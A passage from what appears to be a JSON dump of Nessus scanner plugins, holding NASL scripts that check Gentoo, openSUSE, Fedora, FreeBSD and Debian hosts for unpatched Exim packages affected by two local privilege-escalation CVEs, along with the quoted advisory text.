this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-19.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103447);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"GLSA\", value:\"201709-19\");\n\n script_name(english:\"GLSA-201709-19 : Exim: Local privilege escalation (Stack Clash)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-19\n(Exim: Local privilege escalation)\n\n Exim supports the use of multiple “-p” command line arguments\n causing a memory leak. This could lead to a stack-clash in user-space and\n as result the attacker can, “clash” or “smash” the stack or\n another memory region, or “jump” over the stack guard-page.\n \nImpact :\n\n A local attacker could obtain root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.89-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.89-r1\"), vulnerable:make_list(\"lt 4.89-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:11", "description": "This update for exim fixes the following issues :\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling, which could be used to exhaust memory and make 'stack crash' attacks likely.\n (boo#1044692)", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2017-714) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-714.NASL", "href": "https://www.tenable.com/plugins/nessus/101125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-714.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101125);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-714) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-714 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\n - CVE-2017-1000369: Fixed a memory leak in exim\n commandline handling, which could be used to exhaust\n memory and make 'stack crash' attacks likely.\n (boo#1044692)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:23:41", "description": "This is new version fixing local privilege escalation for set-uid root when using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 23 : exim-4.86.2-1.fc23 (2016-e062971917)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-E062971917.NASL", "href": "https://www.tenable.com/plugins/nessus/89891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-e062971917.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89891);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"FEDORA\", value:\"2016-e062971917\");\n\n script_name(english:\"Fedora 23 : exim-4.86.2-1.fc23 (2016-e062971917)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is new version fixing local privilege escalation for set-uid root\nwhen using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314293\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178745.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?76b9485b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"exim-4.86.2-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:04", "description": "This is new version fixing local privilege escalation for set-uid root when using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-0E3CA94D88.NASL", "href": "https://www.tenable.com/plugins/nessus/89881", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-0e3ca94d88.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89881);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"FEDORA\", value:\"2016-0e3ca94d88\");\n\n script_name(english:\"Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is new version fixing local privilege escalation for set-uid root\nwhen using perl_startup.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1314293\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178772.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fea83aec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"exim-4.85.2-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:19", "description": "The Exim development team reports :\n\nAll installations having Exim set-uid root and using 'perl_startup' are vulnerable to a local privilege escalation. Any user who can start an instance of Exim (and this is normally any user) can gain root privileges. If you do not use 'perl_startup' you should be safe.", "cvss3": {}, "published": "2016-03-03T00:00:00", "type": "nessus", "title": "FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:exim", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "href": "https://www.tenable.com/plugins/nessus/89089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89089);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1531\");\n\n script_name(english:\"FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Exim development team reports :\n\nAll installations having Exim set-uid root and using 'perl_startup'\nare vulnerable to a local privilege escalation. Any user who can start\nan instance of Exim (and this is normally any user) can gain root\nprivileges. If you do not use 'perl_startup' you should be safe.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.exim.org/lurker/message/20160302.191005.a72d8433.en.html\"\n );\n # https://vuxml.freebsd.org/freebsd/7d09b9ee-e0ba-11e5-abc4-6fb07af136d2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b631496\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.86.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.85.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.84.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:37:14", "description": "A local root privilege escalation vulnerability was found in Exim, Debian's default mail transfer agent, in configurations using the'perl_startup' option (Only Exim via exim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete execution environment by default, affecting Exim and subprocesses such as transports calling other programs, and thus may break existing installations. New configuration options (keep_environment, add_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at https://www.exim.org/static/doc/CVE-2016-1531.txt", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Debian DSA-3517-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3517.NASL", "href": "https://www.tenable.com/plugins/nessus/89926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3517. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89926);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1531\");\n script_xref(name:\"DSA\", value:\"3517\");\n\n script_name(english:\"Debian DSA-3517-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A local root privilege escalation vulnerability was found in Exim,\nDebian's default mail transfer agent, in configurations using\nthe'perl_startup' option (Only Exim via exim4-daemon-heavy enables\nPerl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/CVE-2016-1531.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3517\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", 